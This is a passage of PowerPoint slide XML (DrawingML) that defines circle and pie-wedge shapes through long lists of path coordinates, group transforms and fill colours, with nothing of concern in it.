                  <a:lnTo>
                    <a:pt x="1392716" y="1536639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1427810" y="1507506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1461361" y="1476519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493285" y="1443736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523494" y="1409215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1551905" y="1373011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1578431" y="1335182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1602987" y="1295785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625488" y="1254877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1645847" y="1212515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1663979" y="1168756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1679800" y="1123657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1693223" y="1077274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1704162" y="1029665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="860501" y="860501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029665" y="16713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981521" y="8445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="933551" y="2941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885840" y="145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838475" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CF5C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986842" y="6253761"/>
              <a:ext cx="1400175" cy="1400175"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1400175" h="1400175">
                  <a:moveTo>
                    <a:pt x="696664" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="650416" y="1715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604764" y="6455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559829" y="14137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515736" y="24680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472606" y="38002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430563" y="54021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389730" y="72656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350228" y="93826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312181" y="117447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275712" y="143439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240943" y="171721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207997" y="202209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176997" y="234823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148066" y="269481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121326" y="306102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96900" y="344603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74911" y="384902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55482" y="426919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38735" y="470571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24793" y="515777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13779" y="562455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5946" y="609753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1380" y="656824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="703545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1723" y="749793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6468" y="795445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14154" y="840379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24699" y="884471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38022" y="927599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54040" y="969640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72674" y="1010471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93840" y="1049970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117458" y="1088013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143446" y="1124478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171723" y="1159242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202206" y="1192182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234815" y="1223175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269468" y="1252099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="306083" y="1278830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344579" y="1303247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384875" y="1325225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426888" y="1344643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470537" y="1361378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515741" y="1375305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562419" y="1386304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609717" y="1394151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656788" y="1398730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703509" y="1400120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749757" y="1398405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795409" y="1393666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840342" y="1385985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="884435" y="1375443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927563" y="1362122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="969604" y="1346105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010435" y="1327472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049933" y="1306306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1087977" y="1282688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124441" y="1256700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1159205" y="1228424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192145" y="1197941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223139" y="1165334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1252062" y="1130683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1278794" y="1094071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1303210" y="1055580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1325189" y="1015291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344607" y="973286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1361341" y="929646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1375269" y="884454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1386268" y="837791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1394115" y="790493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398693" y="743422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400084" y="696701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398369" y="650453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1393630" y="604800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1385948" y="559866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1375407" y="515772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1362086" y="472643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1346069" y="430600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1327436" y="389766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306270" y="350264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1282652" y="312218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256664" y="275748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1228387" y="240979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197905" y="208034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165297" y="177034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1130647" y="148102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1094035" y="121362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1055543" y="96937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015254" y="74947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973249" y="55518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929610" y="38771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="884418" y="24829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837755" y="13815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790456" y="5968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743385" y="1390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696664" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FF886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42048" y="6512052"/>
              <a:ext cx="879348" cy="880872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10362534" y="6093256"/>
            <a:ext cx="1704339" cy="1721485"/>
            <a:chOff x="10362534" y="6093256"/>
            <a:chExt cx="1704339" cy="1721485"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="object 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10362534" y="6093256"/>
              <a:ext cx="1704339" cy="1721485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1704340" h="1721484">
                  <a:moveTo>
                    <a:pt x="838430" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="791496" y="2448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745078" y="7433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699262" y="14898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="654134" y="24787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609778" y="37041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566281" y="51604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523728" y="68420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482204" y="87431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441795" y="108580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402587" y="131811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364664" y="157066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328114" y="184289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293020" y="213423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259468" y="244410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227545" y="277194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197335" y="311718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168925" y="347925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142399" y="385758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117843" y="425160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95342" y="466075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74983" y="508444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56850" y="552212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41030" y="597322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27607" y="643716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16668" y="691337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8412" y="739481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2920" y="787451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="835162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="882527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2457" y="929461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7450" y="975879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14923" y="1021694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24817" y="1066823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37077" y="1111178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51645" y="1154676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68464" y="1197229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87478" y="1238753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108629" y="1279161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131861" y="1318370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157116" y="1356292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184338" y="1392843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213470" y="1427937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244454" y="1461488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277235" y="1493411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311754" y="1523621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347956" y="1552032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385783" y="1578558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425178" y="1603114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466084" y="1625614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508444" y="1645973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552202" y="1664106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597301" y="1679927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643683" y="1693349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691292" y="1704289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739436" y="1712551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787406" y="1718048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835116" y="1720837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882481" y="1720977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929415" y="1718522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="975833" y="1713531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021649" y="1706060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1066778" y="1696167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111133" y="1683908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1154630" y="1669340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197184" y="1652520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238707" y="1633506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279116" y="1612353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1318324" y="1589120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356247" y="1563863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392798" y="1536639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1427892" y="1507506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1461443" y="1476519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493366" y="1443736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523576" y="1409215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1551986" y="1373011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1578513" y="1335182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1603069" y="1295785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625569" y="1254877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1645928" y="1212515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1664061" y="1168756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1679881" y="1123657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1693304" y="1077274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1704244" y="1029665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="860456" y="860501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029620" y="16713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981475" y="8445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="933505" y="2941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885795" y="145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838430" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="57AE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0522866" y="6253761"/>
              <a:ext cx="1400175" cy="1400175"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1400175" h="1400175">
                  <a:moveTo>
                    <a:pt x="696665" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="650409" y="1715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604751" y="6455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559812" y="14137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515717" y="24680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472586" y="38002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430544" y="54021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389712" y="72656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350213" y="93826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312170" y="117447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275705" y="143439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240941" y="171721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208000" y="202209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177006" y="234823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148080" y="269481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121345" y="306102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96924" y="344603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74939" y="384902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55513" y="426919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38769" y="470571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24829" y="515777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13815" y="562455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5968" y="609753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1390" y="656824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="703545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1715" y="749793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6454" y="795445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14135" y="840379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24677" y="884471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37997" y="927599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54015" y="969640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72647" y="1010471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93814" y="1049970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117432" y="1088013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143420" y="1124478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171696" y="1159242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202179" y="1192182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234786" y="1223175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269437" y="1252099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="306048" y="1278830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344540" y="1303247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384829" y="1325225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426834" y="1344643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470474" y="1361378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515666" y="1375305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562328" y="1386304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609627" y="1394151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656698" y="1398730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703419" y="1400120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749667" y="1398405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795320" y="1393666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840254" y="1385985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="884347" y="1375443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927477" y="1362122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="969520" y="1346105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010354" y="1327472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049855" y="1306306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1087902" y="1282688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124371" y="1256700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1159140" y="1228424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192086" y="1197941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223086" y="1165334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1252017" y="1130683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1278757" y="1094071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1303183" y="1055580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1325172" y="1015291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344602" y="973286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1361349" y="929646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1375290" y="884454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1386304" y="837791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1394152" y="790493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398730" y="743422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400120" y="696701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398405" y="650453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1393666" y="604800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1385985" y="559866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1375443" y="515772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1362123" y="472643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1346105" y="430600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1327473" y="389766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306306" y="350264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1282688" y="312218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256700" y="275748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1228424" y="240979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197941" y="208034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165334" y="177034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1130683" y="148102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1094072" y="121362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1055580" y="96937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015291" y="74947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973286" y="55518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929646" y="38771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="884454" y="24829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837791" y="13815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790479" y="5968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743395" y="1390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696665" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0184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91444" y="6521196"/>
              <a:ext cx="862583" cy="862583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3191687" y="6068618"/>
            <a:ext cx="1704339" cy="1721485"/>
            <a:chOff x="3191687" y="6068618"/>
            <a:chExt cx="1704339" cy="1721485"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="object 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3191687" y="6068618"/>
              <a:ext cx="1704339" cy="1721485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1704339" h="1721484">
                  <a:moveTo>
                    <a:pt x="838475" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="791541" y="2448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745124" y="7432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699308" y="14897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="654179" y="24784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609824" y="37037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566327" y="51599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523773" y="68413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482250" y="87422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441841" y="108569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402632" y="131797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364710" y="157049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328159" y="184268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293065" y="213398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259514" y="244380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227591" y="277159"/>
